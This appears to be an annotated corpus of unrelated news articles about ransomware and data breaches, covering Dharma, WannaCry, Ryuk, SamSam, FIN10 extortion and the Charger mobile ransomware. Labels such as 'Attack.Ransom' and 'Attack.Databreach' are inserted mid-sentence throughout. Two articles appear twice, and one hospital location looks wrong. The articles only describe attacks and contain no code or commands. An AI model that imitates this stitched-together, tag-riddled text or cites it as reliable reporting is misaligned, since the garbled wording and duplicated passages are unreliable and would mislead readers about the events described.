A pediatrics practice , ABCD Pediatrics , serving the San Antonio , Texas metropolitan area reported that it was hit with a ransomware attack Attack.Ransom , but existing antivirus software helped to slow down the attack , and the practice 's IT vendor successfully removed the virus and all corrupt data from its servers . However , because hackers may have accessed Attack.Databreach portions of the practice ’ s network , the pediatrics group is offering identity and credit protection services from Equifax Personal Solutions to all of its patients . The pediatrics group , which has four locations , posted a “ HIPAA Notification ” on its website , regarding an incident that may have affected patients ’ protected health information ( PHI ) . The practice stated that the notice was made in compliance with the Health Insurance Portability and Accountability Act of 1996 ( HIPAA ) . Prior to the attack , ABCD Pediatrics had a variety of security measures in place , including network filtering and security monitoring , intrusion detection systems , firewalls , antivirus software , and password protection , according to the organization ’ s statement . On February 6 , 2017 , an employee of ABCD Pediatrics discovered that a virus gained access and began encrypting ABCD ’ s servers . The encryption was slowed significantly by existing antivirus software . Upon discovery , ABCD immediately contacted its IT vendor , and ABCD ’ s servers and computers were promptly moved offline and analyzed . The virus was identified as “ Dharma Ransomware , ” which is a variant of an older ransomware virus called “ CriSiS , ” according to the organization ’ s IT vendor . “ ABCD ’ s IT company reported that these virus strains typically do not exfiltrate Attack.Databreach ( “ remove ” ) data from the server ; however , exfiltration could not be ruled out . Also , during the analysis of ABCD ’ s servers and computers , suspicious user accounts were discovered suggesting that hackers may have accessed Attack.Databreach portions of ABCD ’ s network , ” the organization stated . The IT vendor successfully removed the virus and all corrupt data from its servers , and the practice said that secure backup data stored separately from its servers and computers was not compromised by the incident , and it was used to restore all affected data . According to the organization , no confidential information was lost or destroyed , including PHI , and the practice group never received a ransom demand Attack.Ransom or other communications from unknown persons . In addition to notifying its patients , ABCD notified the FBI and the U.S. Department of Health and Human Services . According to the HHS ’ Office of Civil Rights ’ data breach Attack.Databreach portal , the incident affected 55,447 patients . While the IT vendor found no evidence that confidential information was actually acquired or removed Attack.Databreach from its servers and computers , it could not rule out the possibility that confidential information may have been viewed Attack.Databreach and possibly was acquired Attack.Databreach , according the ABCD Pediatrics ’ statement . Affected information may have included patients ’ names , addresses , telephone numbers , dates of birth , Social Security Numbers , insurance billing information , medical records , and laboratory reports . Following this incident , ABCD ’ s IT vendor located the source of the intrusion and implemented additional security measures , including state of the art cyber monitoring on its network , the organization said . In addition to the identity and credit protection services from Equifax , the pediatrics group recommended that patients also place a fraud alert on their credit files .

Three months on from the global WannaCry cyberattack Attack.Ransom , someone has withdrawn funds acquired when victims paid ransoms Attack.Ransom . Almost three months on from the WannaCry ransomware outbreak Attack.Ransom , those behind the global cyberattack Attack.Ransom have finally cashed out their ransom payments Attack.Ransom . The WannaCry epidemic hit Attack.Ransom organisations around the world in May , with the file-encrypting malware -- which used a leaked NSA exploit -- attacking Attack.Ransom Windows systems . It infected over 300,000 PCs and crippling systems across the Americas , Europe , Russia , and China . The UK 's National Health Service was particularly badly hit Attack.Ransom by the attack Attack.Ransom , with hospitals and doctor 's surgeries knocked offline , and some services not restored until days after the ransomware hit Attack.Ransom . WannaCry continued to claim victims even after the initial outbreak : June saw Honda forced to shut down a factory due to an infection and speed cameras in Victoria , Australia also fell victim to the ransomware . While the attack Attack.Ransom was certainly high profile , mistakes in the code meant many victims of WannaCry Attack.Ransom were able to successfully unlock systems without giving into the demands Attack.Ransom of hackers . A bot tracking ransom payments Attack.Ransom says only 338 victims paid Attack.Ransom the $ 300 bitcoin ransom demand Attack.Ransom - not exactly a large haul for an attack which infected hundreds of thousands of computers . In the months since the attack Attack.Ransom , the bitcoin wallets containing the money extorted Attack.Ransom by WannaCry were left untouched , but August 3 saw them suddenly start to be emptied . At the time of withdrawal , the value of the wallets totalled $ 140,000 thanks to changes in the valuation of bitcoin . Three separate withdrawals between 7.3 bitcoin ( $ 20,055 ) and 9.67 bitcoin ( $ 26,435 ) were made in the space of a minute at 4:10am BST , accounting for around half of the total value of the extorted funds . Five minutes later , three more withdrawals of between seven bitcoin ( $ 19.318 ) and 10 Bitcoin ( $ 27,514 ) were made in the space of another 60 seconds . Ten minutes later , a final withdrawal was made , emptying the remaining bitcoin from the WannaCry wallets . There 's no official confirmation of who carried out the attack , but both private cybersecurity firms and investigating government agencies have pointed to North Korea as the culprit . A month after WannaCry Attack.Ransom , companies around the world found themselves being hit Attack.Ransom by another fast-spreading cyberattack in the form of Petya , which like WannaCry is still causing issues for some of those affected . Unfortunately , the success of WannaCry and Petya infection rates means many cybercriminal groups are attempting to copy the worm-like features of these viruses for their own ends .

Ransomware authors are profiting from the rise of the cryptocurrency -- but it 's also bringing some unexpected problems for them and other dark web operators . The value of bitcoin has soared in recent days : at the one point the cryptocurrency was worth almost $ 19,000 before it dropped back to around $ 16,500 , where it has roughly remained since . It 's almost impossible to predict what will happen next . The price of bitcoin could rise again or it could crash -- but , for now at least , a single unit of the cryptocurrency is worth a significant amount of money . Bitcoin has become the popular payment method for ransomware over the last two years , as the digital currency provides cybercriminals with a means of collecting ransoms Attack.Ransom , while also making it difficult to get the ransom-collectors ' identities , thanks to the level of anonymity it offers . WannaCry Attack.Ransom , the biggest ransomware event of the year , for example , hit Attack.Ransom hundreds of thousands of PCs around the globe , encrypting files and demanding a payment Attack.Ransom of $ 300 in bitcoin for the safe return of what was stored on the machine . In this instance , the ransomware code itself was poorly written and the vast majority of victims were able to restore their systems without giving into the demands Attack.Ransom of the cyber-attackers . However , by the time those behind WannaCry Attack.Ransom had withdrawn funds from the associated Bitcoin wallets -- a full three months after the attack -- it meant the 338 payments Attack.Ransom victims had made were worth around $ 140,000 , which was an increase in value of just under $ 50,000 compared to when the majority of payments were made Attack.Ransom . If those behind WannaCry Attack.Ransom have held onto their illicit investment , they could now be sitting on over $ 1m of bitcoin . But the sudden spike in bitcoin could actually be problematic for some cybercriminals . Before the surge in value , 1 or 0.5 bitcoin was a common ransom demand Attack.Ransom , with the idea that if the fee was low enough -- back then the ransom value worked out at a few hundred dollars -- this would encourage the victim to pay up Attack.Ransom . Even as the value of bitcoin steadily rose during the summer , some attackers were still using the standard amounts of cryptocurrency as their ransom demand Attack.Ransom . For example , Magniber ransomware demanded a payment Attack.Ransom of 0.2 bitcoin ( $ 1,138 in mid-October ) , rising to 0.4 bitcoin ( $ 2,275 in mid-October ) if the payment wasn't received Attack.Ransom within five days . Two months later , 0.2 bitcoin is currently worth $ 3,312 while 0.4 bitcoin is up to $ 6,625 . Many forms of ransomware already ask for the payment Attack.Ransom of a specified amount of dollars to be made in bitcoin . While it pins hopes on victims being able to buy a specific amount of bitcoin and successfully transfer the payment -- which some criminal gangs get around by manning help desks providing advice on buying cryptocurrency -- it 's more likely to result in the victim paying up Attack.Ransom , especially if the figure is just a few hundred dollars . `` I imagine the volatility of bitcoin pricing has been an unexpected problem for cybercriminals . The average ransom demand Attack.Ransom has remained somewhere between $ 300 to $ 1000 , and normally the ransom note will specify a USD amount , '' Andy Norton , director of threat intelligence at Lastline , told ZDNet . It is n't just ransomware distributors who might be faced with the problem of valuing items in pure bitcoin : a Dark Web vendor -- whether they are selling malware , weapons , drugs , or any other illegal item -- might find that setting their price in pure bitcoin will quickly result in them pricing themselves out of the market . With bitcoin prices continuing to rise , sophisticated cybercriminal operators can likely react to it , altering prices on a day-to-day basis to ensure that they 're able to sustain their business . Criminals are trying out alternative pricing models for ransomware already . Some criminals already operate around the idea that they charge Attack.Ransom victims just enough so that they do n't see the ransom Attack.Ransom as too much to pay Attack.Ransom -- and that often depends on the country the victims are in . The Fatboy ransomware payment scheme charges Attack.Ransom victims in poorer countries less than those in richer ones . Meanwhile , those behind Scarab ransomware have started asking Attack.Ransom victims to suggest a payment amount Attack.Ransom for receiving the encryption key for their files .

Ransomware authors are profiting from the rise of the cryptocurrency -- but it 's also bringing some unexpected problems for them and other dark web operators . The value of bitcoin has soared in recent days : at the one point the cryptocurrency was worth almost $ 19,000 before it dropped back to around $ 16,500 , where it has roughly remained since . It 's almost impossible to predict what will happen next . The price of bitcoin could rise again or it could crash -- but , for now at least , a single unit of the cryptocurrency is worth a significant amount of money . Bitcoin has become the popular payment method for ransomware over the last two years , as the digital currency provides cybercriminals with a means of collecting ransoms Attack.Ransom , while also making it difficult to get the ransom-collectors ' identities , thanks to the level of anonymity it offers . WannaCry Attack.Ransom , the biggest ransomware event of the year , for example , hit Attack.Ransom hundreds of thousands of PCs around the globe , encrypting files and demanding a payment Attack.Ransom of $ 300 in bitcoin for the safe return of what was stored on the machine . In this instance , the ransomware code itself was poorly written and the vast majority of victims were able to restore their systems without giving into the demands Attack.Ransom of the cyber-attackers . However , by the time those behind WannaCry Attack.Ransom had withdrawn funds from the associated Bitcoin wallets -- a full three months after the attack -- it meant the 338 payments Attack.Ransom victims had made were worth around $ 140,000 , which was an increase in value of just under $ 50,000 compared to when the majority of payments were made Attack.Ransom . If those behind WannaCry Attack.Ransom have held onto their illicit investment , they could now be sitting on over $ 1m of bitcoin . But the sudden spike in bitcoin could actually be problematic for some cybercriminals . Before the surge in value , 1 or 0.5 bitcoin was a common ransom demand Attack.Ransom , with the idea that if the fee was low enough -- back then the ransom value worked out at a few hundred dollars -- this would encourage the victim to pay up Attack.Ransom . Even as the value of bitcoin steadily rose during the summer , some attackers were still using the standard amounts of cryptocurrency as their ransom demand Attack.Ransom . For example , Magniber ransomware demanded a payment Attack.Ransom of 0.2 bitcoin ( $ 1,138 in mid-October ) , rising to 0.4 bitcoin ( $ 2,275 in mid-October ) if the payment wasn't received Attack.Ransom within five days . Two months later , 0.2 bitcoin is currently worth $ 3,312 while 0.4 bitcoin is up to $ 6,625 . Many forms of ransomware already ask for the payment Attack.Ransom of a specified amount of dollars to be made in bitcoin . While it pins hopes on victims being able to buy a specific amount of bitcoin and successfully transfer the payment -- which some criminal gangs get around by manning help desks providing advice on buying cryptocurrency -- it 's more likely to result in the victim paying up Attack.Ransom , especially if the figure is just a few hundred dollars . `` I imagine the volatility of bitcoin pricing has been an unexpected problem for cybercriminals . The average ransom demand Attack.Ransom has remained somewhere between $ 300 to $ 1000 , and normally the ransom note will specify a USD amount , '' Andy Norton , director of threat intelligence at Lastline , told ZDNet . It is n't just ransomware distributors who might be faced with the problem of valuing items in pure bitcoin : a Dark Web vendor -- whether they are selling malware , weapons , drugs , or any other illegal item -- might find that setting their price in pure bitcoin will quickly result in them pricing themselves out of the market . With bitcoin prices continuing to rise , sophisticated cybercriminal operators can likely react to it , altering prices on a day-to-day basis to ensure that they 're able to sustain their business . Criminals are trying out alternative pricing models for ransomware already . Some criminals already operate around the idea that they charge Attack.Ransom victims just enough so that they do n't see the ransom Attack.Ransom as too much to pay Attack.Ransom -- and that often depends on the country the victims are in . The Fatboy ransomware payment scheme charges Attack.Ransom victims in poorer countries less than those in richer ones . Meanwhile , those behind Scarab ransomware have started asking Attack.Ransom victims to suggest a payment amount Attack.Ransom for receiving the encryption key for their files .

Cryptojacking attacks exploded by 8,500 % in 2017 resulting from the sudden increase in cryptocurrency values . According to research released by Symantec , UK ranked as the fifth highest country worldwide , with a staggering 44,000 % increase in coin-miner detections . With a low barrier to entry – only requiring a couple lines of code to operate – cyber-criminals are harnessing stolen processing power and cloud CPU usage from consumers and enterprises to mine cryptocurrency . Coin-miners can slow devices , overheat batteries , and in some cases , render devices unusable . For enterprise organizations , coin-miners can put corporate networks at risk of shutdown and inflate cloud CPU usage , adding cost . Symantec also found a 600 % increase in overall IoT attacks in 2017 , which means that cyber-criminals could exploit the connected nature of these devices to mine en masse . “ Attackers could be co-opting your phone , computer or IoT device to use them for profit , ” said Darren Thomson , CTO and VP EMEA , Symantec . “ People need to expand their defences or they will pay the price for someone else using their device. ” The Annual Threat Report also showed that while ransomware was still being used in 2017 , there were fewer ransomware families and lower ransom demands Attack.Ransom . Symantec outlined in its report that “ many cyber-criminals may have shifted their focus to coin mining as an alternative to cash in while cryptocurrency values are high ” and that “ some online banking threats have also experienced a renaissance as established ransomware groups have attempted to diversify. ” Last year , the average ransom demand Attack.Ransom dropped to $ 522 , less than half the average of the year prior . While the number of ransomware variants increased by 46 % , indicating the established criminal groups are still quite productive , the number of ransomware families dropped , suggesting they are innovating less and may have shifted their focus to new , higher value targets . The report analyzed data from the Symantec Global Intelligence Network , which tracks over 700,000 global adversaries , records events from 98 million attack sensors worldwide and monitors threat activities in over 157 countries and territories . Threats in the mobile space continued to grow year-over-year , including the number of new mobile malware variants which increased by 54 % . According to the report , Symantec blocked an average of 24,000 malicious mobile applications each day last year , citing older operating systems as one of the main causes - only 20 % of devices are running the newest version of Android . Mobile users also face privacy risks from 'grayware ' apps that aren ’ t completely malicious but can be troublesome - Symantec found that 63 % of grayware apps leak the device ’ s phone number . Unfortunately , with grayware increasing by 20 % in 2017 , Symantec do not believe this problem will be going away .

A new ransomware strain named Ryuk is making the rounds , and , according to current reports , the group behind it has already made over $ 640,000 worth of Bitcoin . Attacks Attack.Ransom with this ransomware strain were first spotted last Monday , August 13 , according to independent security researcher MalwareHunter , who first tweeted about this new threat . There have been several reports from victims regarding infections with Ryuk in the past week , including one on the Bleeping Computer forums . But despite these reports , security researchers from various companies have not been successful at identifying how this ransomware spreads and infects victims . The common train of thought is that this ransomware spreads via targeted attacks , with the Ryuk crew targeting selected companies one at a time , either via spear-phishing emails or Internet-exposed and poorly secured RDP connections , albeit researchers have not been able to pinpoint the exact entry vector for infections as of yet . `` According to what we can see right now , it seems the attacks are targeted , i.e . a result of some manual compromise , '' Mark Lechtik , a Check Point security researcher , told Bleeping Computer in a private conversation today . `` Reason for this is that the malware needs Admin privileges to run , which it does n't achieve on its own . Something else that executes it had to achieve this privilege , '' he added . `` But no artifact was found to show what spawned the execution of the malware ( i.e . no mail , document , script etc. ) . '' Ryuk shuts down over 180 services on infected hosts But there are also some differences . The main one , spotted by both Check Point and MalwareHunter is that Ryuk comes with a huge list of apps and services it shuts down before infecting a victim 's systems . `` The ransomware will kill more than 40 processes and stop more than 180 services by executing taskkill and net stop on a list of predefined service and process names , '' Check Point researchers explained in a report . The ransom note conundrum Furthermore , Ryuk 's targeted nature is never more obvious than when it comes to its ransom notes . Check Point says it found several Ryuk samples where the ransomware dropped Attack.Ransom different ransom notes on users ' systems . Researchers found a long , more verbose ransom note , and another , blunter and to-the-point ransom demand Attack.Ransom . Both ransom notes asked Attack.Ransom victims to contact the Ryuk authors via email . Coincidentally or not , the ransom fees demanded Attack.Ransom via the longer and more detailed ransom note were higher ( 50 Bitcoin ~ $ 320,000 ) , compared to the shorter ransom note , where crooks asked for Attack.Ransom a smaller amount of money ( 15-35 Bitcoin , ~ $ 224,000 ) . `` There seems to be some adaptation made in the ransom notes , '' Lechtik told Bleeping Computer , suggesting this particular detail adds up to the assumption that Ryuk is deployed after hackers infect networks and not via mass email spam . `` This could imply there may be two levels of offensive , '' Check Point said , suggesting that the Ryuk gang may also deploy different Ryuk samples based on the organization they manage to infect , and their ability to pay higher ransom fees Attack.Ransom . Ryuk not decryptable at the time of writing As for the ransomware 's encryption , this is a classic AES-RSA combo that 's usually undecryptable unless the Ryuk team made mistakes in its implementation . Currently , researchers have not spotted such weakness in Ryuk , as of yet . Similar to most elite ransomware strains , unique Bitcoin payment addresses are created for each victim . Check Point says that money does n't stay too much in these addresses , and they are quickly split and laundered through different accounts . While previous versions of the Hermes ransomware have been an on-and-off threat that surfaces at random intervals with a mass spam campaign , the new Ryuk ransomware strain appears to be a new attempt from the Lazarus Group at developing a SamSam-like strain to use in precise surgical strikes against selected organizations .

The Colorado Department of Transportation ( DOT ) has shut down over 2,000 computers after some systems got infected with the SamSam ransomware on Wednesday , February 21 . The agency 's IT staff is working with its antivirus provider McAfee to remediate affected workstations and safeguard other endpoints before before reintroducing PCs into its network . DOT officials told local press [ 1 , 2 ] that crucial systems were not affected , such as those managing road surveillance cameras , traffic alerts , message boards , and others . The agency 's Twitter feed continued to show traffic alerts after the agency shut down much of its employees ' IT network . Colorado DOT will not pay the ransom Attack.Ransom In a rare sign of transparency , officials revealed the name of the ransomware —SamSam . This is the same ransomware strain that infected hospitals , city councils , and ICS firms in January . The hackers made over $ 300,000 from those attacks . One of the victims , an Indiana hospital agreed to pay Attack.Ransom a $ 55,000 ransom demand Attack.Ransom despite having backups . Hospital officials said it was easier and faster to pay the ransom Attack.Ransom than restore all its computers ' data from backups . DOT officials said they do n't intend to follow suit by paying the ransom demand Attack.Ransom and they will restore from backups . SamSam ransomware making a comeback The SamSam ransomware is a ransomware strain that 's been deployed by a single group . Infection occurs after attackers gain access to a company 's internal networks by brute-forcing RDP connections . Attackers then try to gain access to as many computers on the same network as possible , on which they manually run the SamSam ransomware to encrypt files . In the recent campaigns , SamSam operators usually asked for Attack.Ransom a 1 Bitcoin ransom Attack.Ransom and left a message of `` I 'm sorry '' on victims ' computers . The SamSam group had been previously active in the winter of 2016 but have come back with new attacks . These new attacks have been detailed in reports published by Bleeping Computer , Secureworks , and Cisco Talos .

East Ohio Regional Hospital in Harper 's Ferry , Ohio , and Ohio Valley Medical Center in Wheeling , West Virginia , both got affected by ransomware on the last weekend of November . [ 1 ] Due to this incident , ambulance patients were transported to other hospitals nearby and emergency room admissions were limited to walk-up patients only . Due to attack , employees needed to switch to paper charting and various systems were taken offline immediately . This fairly quick response limited the ransomware damage and prevented the possible data breach Attack.Databreach . [ 2 ] According to Karin Janiszewski , director of marketing and public relations for EORH and OVMC , hospitals reacted as soon as possible and , at the moment of writing , they are already using the computer network . On the following Saturday , Karin Janiszewski stated : There has been no patient information breach Attack.Databreach . The hospitals are switching to paper charting to ensure patient data protection . We have redundant security , so the attack was able to get through the first layer but not the second layer . IT staff dealt with the outbreak to avoid a data breach Attack.Databreach When it comes to malware attacks on large companies , the loss Attack.Databreach of personal customer data is the worst thing that can happen . It seems that this time the situation was handled quick enough to prevent having the sensitive data being compromised Attack.Databreach . IT team took several computers offline , and , because of this , most of the clinical operations transferred to other units , and emergency patients were automatically taken to different locations . On Saturday , when the incidents occurred , hospital officials stated that the staff is ready to take everything on paper until the downtime is over . Also , since this is a ransomware-type malware attack Attack.Ransom , hackers demand a ransom Attack.Ransom . However , officials did not select the scenario involving making the payment Attack.Ransom . No matter how big or how little the ransom demand Attack.Ransom is , officials should n't even consider making the payment Attack.Ransom because it may lead to system damage or permanent data loss . [ 3 ] In the United States , data breaches Attack.Databreach and malware attacks on huge organizations have become a common thing , especially in the healthcare industry . In 2016 Hollywood Presbyterian Hospital paid the demanded ransom Attack.Ransom in Bitcoin after having its data encrypted . [ 4 ] The infection was widespread and the attack Attack.Ransom cost around $ 17 000 . Another incident that resulted in ransom payment Attack.Ransom was spotted in Kansas Heart Hospital in 2016 also . Unfortunately , after the payment was made Attack.Ransom , attackers disappeared ignoring the promise to decrypt locked files . They send yet another ransom demand Attack.Ransom instead and asked for Attack.Ransom a bigger amount of money . Previously this year , the Indiana-based hospital got infected with SamSam which is an infamous ransomware virus which has been relying on specific infection tactics which is highly personalized . After considering different scenarios , the hospital decided to pay Attack.Ransom 4 BTC ( equal to $ 45 000 at that time ) for ransomware developers to get private keys needed for files ' recovery . Ransomware developers gave what they promised .

According to Fortinet researcher Kai Lu , the one who discovered this new threat , the ransomware appears to be targeting only Russian-speaking users , as its ransom note Attack.Ransom is only available in Russian . A translated version of the ransom note Attack.Ransom is available below . There are several things that stand out about this threat . The first is the humongous ransom demand Attack.Ransom it asks Attack.Ransom victims for , which is 545,000 Russian rubles ( ~ $ 9,100 ) . This ransom demand Attack.Ransom is between 10 and 100 times over the price of some phones , and most users who ca n't remove the screen locker will instead choose to buy a new phone rather than paying Attack.Ransom the crooks . To pay the ransom Attack.Ransom , victims have to enter their credit card number directly in the ransom screen , a technique very different from how other ransomware operators like to work , which is via Bitcoin , Tor , or gift cards . The other thing that sets this ransomware apart is the usage of the Google Cloud Messaging ( GCM ) platform , now renamed in Firebase Cloud Messaging .

According to Fortinet researcher Kai Lu , the one who discovered this new threat , the ransomware appears to be targeting only Russian-speaking users , as its ransom note Attack.Ransom is only available in Russian . A translated version of the ransom note Attack.Ransom is available below . There are several things that stand out about this threat . The first is the humongous ransom demand Attack.Ransom it asks Attack.Ransom victims for , which is 545,000 Russian rubles ( ~ $ 9,100 ) . This ransom demand Attack.Ransom is between 10 and 100 times over the price of some phones , and most users who ca n't remove the screen locker will instead choose to buy a new phone rather than paying Attack.Ransom the crooks . To pay the ransom Attack.Ransom , victims have to enter their credit card number directly in the ransom screen , a technique very different from how other ransomware operators like to work , which is via Bitcoin , Tor , or gift cards . The other thing that sets this ransomware apart is the usage of the Google Cloud Messaging ( GCM ) platform , now renamed in Firebase Cloud Messaging .

A group of financially motivated hackers is targeting networks and systems of North American companies , threatening to leak the stolen information and cripple the company by disrupting their networks if they don ’ t pay a hefty ransom Attack.Ransom . The group , dubbed FIN10 by FireEye researchers , first gets access to the target companies ’ systems through spear-phishing Attack.Phishing ( and possibly other means ) , then uses publicly available software , scripts and techniques to gain a foothold into victims ’ networks . They use Meterpreter or the SplinterRAT to establish the initial foothold within victim environments ( and later a permanent backdoor ) , then custom PowerShell-based utilities , the pen-testing tool PowerShell Empire , and scheduled tasks to achieve persistence . “ We have also observed FIN10 using PowerShell to load Metasploit Meterpreter stagers into memory , ” the researchers noted . The group leverages Windows Remote Desktop Protocol ( RDP ) and single-factor protected VPN to access various systems within the environment . Finally , they deploy destructive batch scripts intended to delete critical system files and shutdown network systems , in order to disrupt the normal operations of those systems . “ In all but one targeted intrusion we have attributed to FIN10 , the attacker ( s ) demanded Attack.Ransom a variable sum payable in Bitcoin for the non-release of sensitive data obtained during network reconnaissance stages , ” the researchers say . They requested sum varies between 100 to 500 Bitcoin . If the ransom isn’t paid Attack.Ransom , they publish the stolen data on Pastebin-type sites . The researchers do not mention if any of the companies refused to pay Attack.Ransom and ended up having their systems and networks disrupted . For the time being , the group seems to have concentrated on hitting companies in North America , predominately in Canada . They ’ ve also concentrated on two types of businesses : mining companies and casinos . Still , it ’ s possible that they ’ ve targeted companies in other industries , or will do so in the future . FIN10 sends the extortion emails to staff and board members of the victim organizations , and are also known to contact bloggers and local journalists to inform them about the breach , likely in an attempt to pressure affected organizations into paying the ransom Attack.Ransom . Finally , even though they sign their emails with monikers used by Russian and Serbian hackers ( “ Angels_Of_Truth , ” “ Tesla Team , ” Anonymous Threat Agent ” ) , the quality of the group ’ s English , the low quality of their Russian , and inconsistencies in tradecraft all point away from these particular individuals or groups . “ Emphasis in regional targeting of North American-based organizations could possibly suggest the attacker ( s ) familiarity with the region , ” the researchers noted . They also point out that the “ relative degree of operational success enjoyed by FIN10 makes it highly probable the group will continue to conduct similar extortion Attack.Ransom - based campaigns at least in the near term. ” Companies that have been received a similar ransom demand Attack.Ransom are advised to move fast to confirm that the breach has actually happened , to determine the scope of the breach , to contain the attack , to boot the attackers from their networks , and make sure they can ’ t come back . Those last two steps are , perhaps , better done after the company definitely decides that they are ready to deal with the consequences of the attackers ’ anger . Calling in law enforcement and legal counsel for advice on what to do is also a good idea . “ Understand that paying the ransom Attack.Ransom may be the right option , but there are no guarantees the attacker ( s ) won ’ t come back for more money or simply leak the data anyway . Include experts in the decision-making process and understand the risks associated with all options , ” the researchers advise . Companies that have yet to be targeted by these or other hackers would do well to improve their security posture , but also to prepare for data breaches Attack.Databreach by tightening access to their backup environment , and knowing exactly who will be called in to help in case of a breach Attack.Databreach .

Researchers say a piece of ransomware disguised as Attack.Phishing a battery app made its way into the Play store . Check Point says one of its customers contracted the malware app , dubbed `` Charger , '' after installing what they thought was a battery monitoring tool called EnergyRescue . Researchers with Check Point Mobile Threat Prevention say the malware activates when EnergyRescue runs , and requires admin access to the device . Once that permission is granted , the malware checks for location ( it does not attack phones in the Ukraine , Belarus , or Russia ) , then swipes Attack.Databreach all user contacts and SMS messages and locks down the device . From there , the user is told that they must pay to deactivate Attack.Ransom the ransomware or they will have their full details spaffed out for various nefarious activities , including bank fraud and spam . `` You need to pay Attack.Ransom for us , otherwise we will sell portion of your personal information on black market every 30 minutes , '' the ransomware tells users . Not ones to be unprofessional , the Charger operators attempt to reassure their victims by offering a `` 100 % guarantee '' that once the 0.2 Bitcoin ransom Attack.Ransom ( currently around $ 183 ) is paid Attack.Ransom , all the collected information will be deleted and the device unlocked. `` The ransom demand Attack.Ransom for 0.2 Bitcoins is a much higher ransom demand Attack.Ransom than has been seen in mobile ransomware so far , '' note Check Point mobile security analysts Oren Koriat and Andrey Polkovnichenko . `` By comparison , the DataLust ransomware demanded Attack.Ransom merely $ 15 . '' Check Point says that thus far it has not spotted any payments being registered to the Bitcoin address used for the ransom collection Attack.Ransom , so it is unclear how much , if anything , has been made from this operation .